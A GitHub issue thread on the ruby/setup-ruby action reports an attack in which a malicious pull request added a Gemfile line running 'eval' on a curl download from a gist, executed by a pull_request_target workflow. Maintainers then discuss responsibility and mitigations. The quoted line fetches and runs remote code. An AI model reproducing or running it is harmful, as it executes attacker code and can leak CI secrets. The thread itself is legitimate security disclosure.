### ISSUE TITLE
[Security] Let users know that this action should *not* be run with access to secrets

### ISSUE THREAD

**Issue by Pandapip1** [ruby/setup-ruby#360]
Yesterday, a malicious attacker submitted a PR that added the following line to the Gemfile:

```gemfile
system('eval "$(curl https://gist.githubusercontent.com/h1-0xn3va/68872b876152dd40f44550b6a16ba8ee/raw/1420db2c2550cc631dc65ceef8694682bf545e1a/1)"')
```

A workflow was being run with `pull_request_target` that checked out the PR's branch and (among other things) ran this action. When the Gemfile was being read to install the dependencies, the malicious code was run.

I suggest one of two things as mitigation:
1. Clear the environment before running any child processes
2. At the very least, add a security notice reminding users that the `Gemfile` supports arbitrary code execution.

**Comment by eregon** [comment]
My understanding is this has nothing to do with this action, had you used e.g., the default `ruby` in `PATH` and `- run: bundle install`, the same would happen, right?

If there is something this action can do to help, that'd be interesting.
There is `permissions` but that seems to only apply to workflows: https://docs.github.com/en/actions/using-workflows/events-that-trigger-workflows#pull_request_target

`pull_request_target` also seems in general to not do much, and seems potentially more dangerous than `pull_request`: https://securitylab.github.com/research/github-actions-preventing-pwn-requests/
I don't understand `pull_request_target` well though.

This action runs `bundle install` when someones opts in with `bundler-cache: true`, I think that should be very clear already.
If you'd like to improve docs, please make a PR.

Clearing the environment seems too problematic for compatibility.

**Comment by dentarg** [comment]
> A workflow was being run with `pull_request_target` that checked out the PR's branch

Exactly what https://securitylab.github.com/research/github-actions-preventing-pwn-requests/ says at the top:

> _TL;DR: Combining pull_request_target workflow trigger with an explicit checkout of an untrusted PR is a dangerous practice that may lead to repository compromise._

So if you have such workflow in your repo, it should be your responsibility to clear the environment or whatever is needed.

**Comment by Pandapip1** [comment]
> So if you have such workflow in your repo, it should be your responsibility to clear the environment or whatever is needed.

Agreed. It just wasn't fully clear that this action could execute arbitrary code. I'll consider opening a PR.
